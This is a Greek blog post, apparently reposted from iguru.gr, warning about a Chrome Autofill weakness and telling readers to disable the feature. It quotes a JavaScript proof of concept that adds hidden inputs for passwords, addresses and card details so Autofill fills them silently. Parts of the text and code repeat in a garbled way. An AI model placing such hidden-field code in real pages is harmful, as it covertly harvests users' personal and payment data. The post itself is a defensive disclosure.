Ο Google Chrome δεν έχει επιδιορθώσει ακόμη καθορίσει μια γνωστή ευπάθεια στο Autofill (αυτόματη συμπλήρωση) που δημοσιεύθηκε για πρώτη φορά το 2013.
Με αυτή την ευπάθεια, κάποιος hacker μπορεί να αποκρύψει τα πεδία μιας φόρμας σύνδεσης σε μια ιστοσελίδα, και ο Chrome θα συμπληρώσει μόνος του προσωπικά σας στοιχεία αν επιλέξετε να χρησιμοποιήσετε τη λειτουργία αυτόματης συμπλήρωσης ή Autofill.
Το παρακάτω gif περιγράφει το πρόβλημα:
Ο χρήστης hampie του GitHub το παρουσίασε με το παρακάτω JavaScript:
Φυσικά συνιστούμε να απενεργοποιήσετε αμέσως τη λειτουργία αυτόματης συμπλήρωσης του Chrome.
Ας δούμε και τον πιο γρήγορο τρόπο απενεργοποίησης της αυτόματης συμπλήρωσης στο Chrome:
Ανοίξτε τη διεύθυνση: chrome://settings/autofill
και απενεργοποιήστε { OFF } τη λειτουργία.
Αυτό ήταν. Είστε ασφαλής από το συγκεκριμένο exploit !!!
iguru.gr
Με αυτή την ευπάθεια, κάποιος hacker μπορεί να αποκρύψει τα πεδία μιας φόρμας σύνδεσης σε μια ιστοσελίδα, και ο Chrome θα συμπληρώσει μόνος του προσωπικά σας στοιχεία αν επιλέξετε να χρησιμοποιήσετε τη λειτουργία αυτόματης συμπλήρωσης ή Autofill.
Το παρακάτω gif περιγράφει το πρόβλημα:
Ο χρήστης hampie του GitHub το παρουσίασε με το παρακάτω JavaScript:
var autocompletes = ['name', 'honorific-prefix', 'given-name',
'additional-name', 'family-name', 'honorific-suffix',
'nickname', 'username', 'new-password',
'current-password', 'organization-title', 'organization',
'street-address', 'address-line1', 'address-line2',
'address-line3', 'address-level4', 'address-level3',
'address-level2', 'address-level1', 'country',
'country-name', 'postal-code', 'cc-name', 'cc-given-name',
'cc-additional-name', 'cc-family-name', 'cc-exp',
'cc-exp-month', 'cc-exp-year', 'cc-csc', 'cc-type',
'transaction-currency', 'transaction-amount',
'language', 'bday', 'bday-day', 'bday-month',
'bday-year', 'sex', 'url', 'photo', 'tel',
'tel-country-code', 'tel-national',
'tel-area-code', 'tel-local', 'tel-local-prefix',
'tel-local-suffix', 'tel-extension', 'impp'
];
emailField.addEventListener('focus', function() {
var wrap = autocompletes.reduce(function(wrapper, field) {
var input = document.createElement('input');
// Make them not focussable
input.tabIndex = -1;
input.autocomplete = field;
wrapper.appendChild(input);
return wrapper;
}, document.createElement('div'));
// Hide the wrapper
wrap.classList.add('hidden');
form.appendChild(wrap);
// Inject the autocompletes once
this.removeEventListener('focus', arguments.callee);
});
'additional-name', 'family-name', 'honorific-suffix',
'nickname', 'username', 'new-password',
'current-password', 'organization-title', 'organization',
'street-address', 'address-line1', 'address-line2',
'address-line3', 'address-level4', 'address-level3',
'address-level2', 'address-level1', 'country',
'country-name', 'postal-code', 'cc-name', 'cc-given-name',
'cc-additional-name', 'cc-family-name', 'cc-exp',
'cc-exp-month', 'cc-exp-year', 'cc-csc', 'cc-type',
'transaction-currency', 'transaction-amount',
'language', 'bday', 'bday-day', 'bday-month',
'bday-year', 'sex', 'url', 'photo', 'tel',
'tel-country-code', 'tel-national',
'tel-area-code', 'tel-local', 'tel-local-prefix',
'tel-local-suffix', 'tel-extension', 'impp'
];
emailField.addEventListener('focus', function() {
var wrap = autocompletes.reduce(function(wrapper, field) {
var input = document.createElement('input');
// Make them not focussable
input.tabIndex = -1;
input.autocomplete = field;
wrapper.appendChild(input);
return wrapper;
}, document.createElement('div'));
// Hide the wrapper
wrap.classList.add('hidden');
form.appendChild(wrap);
// Inject the autocompletes once
this.removeEventListener('focus', arguments.callee);
});
Φυσικά συνιστούμε να απενεργοποιήσετε αμέσως τη λειτουργία αυτόματης συμπλήρωσης του Chrome.
Ας δούμε και τον πιο γρήγορο τρόπο απενεργοποίησης της αυτόματης συμπλήρωσης στο Chrome:
Ανοίξτε τη διεύθυνση: chrome://settings/autofill
και απενεργοποιήστε { OFF } τη λειτουργία.
Αυτό ήταν. Είστε ασφαλής από το συγκεκριμένο exploit !!!
iguru.gr
Δεν υπάρχουν σχόλια :
Δημοσίευση σχολίου